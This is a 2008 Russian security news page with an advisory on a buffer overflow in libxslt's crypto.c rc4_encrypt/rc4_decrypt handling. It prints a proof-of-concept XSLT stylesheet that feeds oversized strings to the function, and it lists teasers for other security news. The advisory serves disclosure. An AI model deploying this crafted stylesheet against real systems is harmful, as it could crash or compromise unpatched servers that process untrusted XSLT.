Карта   Обратная связь Разместить рекламу

Хроника дня
Связь
Бизнес
Безопасность
Интернет
Новости Software
Наука и техника
Новости Hardware
Е - коммерция
Реклама
Рыночная экономика
Новинки связи

Разместить пресс-релиз


Разделы статей

Системы безопасности связи


Разместить статью на сайте

Переполнение буфера в libxslt

Программа: libxslt 1.x

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в crypto.c при обработке функций XSLT "crypto:rc4_encrypt" и "crypto:rc4_decrypt". Атакующий может передать специально сформированную таблицу стилей, что приведет к выполнению произвольного кода.

Эксплоит:

<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:str="http://exslt.org/strings"
xmlns:crypto="http://exslt.org/crypto"
xmlns:math="http://exslt.org/math"
extension-element-prefixes="str crypto math">
<xsl:template match="/">
<xsl:value-of select="crypto:rc4_encrypt(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)"/>
blah
</xsl:template>
</xsl:stylesheet>



www.xakep.ru

Системы безопасности связи 01-08-2008
Пассивная атака на сеть Tor: вычисление любого пользователя за 20 минут 22-09-2008 Системы безопасности связи
Профессор Angelos Keromytis вместе со своим коллегой Sambuddho Chakravarty из отделения компьютерных наук Колумбийского Университета представят новый способ атаки на сеть Tor. Их доклад "Simulating a Global Passive Adversary for Attacking Tor-like Anonymity Systems" был представлен 30 мая на конференции Secu...


Межсайтовый скриптинг в Quick.Cart 19-09-2008 Системы безопасности связи
Программа: Quick.Cart 3.xУязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных сценарием admin.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.


Игра для iPhone заражает Windows 18-09-2008 Системы безопасности связи
По данным экспертов компании Sophos, киберпреступники выпустили поддельную версию игры Penguin Panic для iPhone, содержащую интегрированный вредоносный код.Этот троян выдает себя за Penguin Panic, игру, где этим небольшим птицам приходится перепрыгивать с айсберга на айсберг. Игра появилась за несколько месяцев до официального открытия Apple iPhone App Store, и в нее начали играть на "разлоченных" телефонах. На данный момент...


Множественные уязвимости в Apple iPhone 16-09-2008 Системы безопасности связи
Программа: Apple iPhoneНайденные уязвимости позволяют удаленному злоумышленнику обойти ограничения безопасности, осуществить спуфинг атаку и выполнить произвольный код на целевой системе.1) Уязвимость возникает из-за того, что виртуальная среда sandbox не правильно разграничивает доступ между приложениями. Атакующий из одного приложения может прочитать файлы другого приложения.2) Уязвимость возникает из-за множественных ошибок в Fre...
 
 
Copyright by www.computercentre.ru.
При использовании материалов нашего сайта ссылка на www.computercentre.ru обязательна.
Rambler's Top100 Рейтинг@Mail.ru